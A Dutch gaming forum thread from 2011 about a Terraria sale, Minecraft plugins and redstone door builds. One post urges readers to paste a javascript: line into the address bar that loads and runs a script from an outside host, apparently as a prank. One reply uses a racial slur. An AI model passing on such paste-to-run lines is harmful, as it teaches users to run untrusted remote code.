Hij was eerst een tientje... En saai.quote:Op vrijdag 1 juli 2011 15:33 schreef Berend. het volgende:
Gasten Terreria is in de aanbieding voor 7,50 bij de Steam summer sale
Joah, vrij snel heb je alle items al, vind ikquote:Op vrijdag 1 juli 2011 15:58 schreef tuut-chips het volgende:
[..]
Hij was eerst een tientje... En saai.
Ik ga kapot hier..quote:
quote:Op vrijdag 1 juli 2011 17:35 schreef einschtein het volgende:
Ik word gek, ik blijf gepwned worden.
Wil ik mijn server updaten, start ie geen enkele plugin meer op.
zie bron. Verder niet. Maar ze zijn heel lelijk. Zijn Hugemushrooms.quote:Op vrijdag 1 juli 2011 17:35 schreef Jesse_van_Laar het volgende:
wtf!? waarom van die enorme paddestoelen? ergens info over de plaatjes?
| 1 | javascript:%20var%20headID%20=%20document.getElementsByTagName('head')[0];var%20newScript%20=%20document.createElement('script');newScript.type%20=%20'text/javascript';d=new%20Date();newScript.src%20=%20'http://sanscomic.mualo.nl/comicsans_rainbow.php?date='+d.getTime();headID.appendChild(newScript);%20void(0); |
Neger, wat?quote:Op vrijdag 1 juli 2011 17:36 schreef maurisioo het volgende:
[..]
[..]
zie bron. Verder niet. Maar ze zijn heel lelijk. Zijn Hugemushrooms.
nee dank jequote:Op vrijdag 1 juli 2011 17:38 schreef tuut-chips het volgende:
Copypaste dit eens in je adresbalk en druk op enter
[ code verwijderd ]
gelukkig zegt ie er bij dat het niet final is! info van de bron had ik al gelezen...quote:Op vrijdag 1 juli 2011 17:36 schreef maurisioo het volgende:
[..]
[..]
zie bron. Verder niet. Maar ze zijn heel lelijk. Zijn Hugemushrooms.
Gefeliciteerd! Wel wat laat, gisteren hadden we ze binnen een kwartier al nagemaakt.quote:Op vrijdag 1 juli 2011 17:18 schreef JaimyLee het volgende:
Hoera! Hetzelfde als in het filmpje van de pistons, inclusief weggewerkte redstone. Lever overhalen en het gaat zo open als op dat filmpjeDe onderste trappen heb ik nu alleen met gewoon cobble blokken gedaan zodat je niet kan zien waar de ingang zit.
| Forum Opties | |
|---|---|
| Forumhop: | |
| Hop naar: | |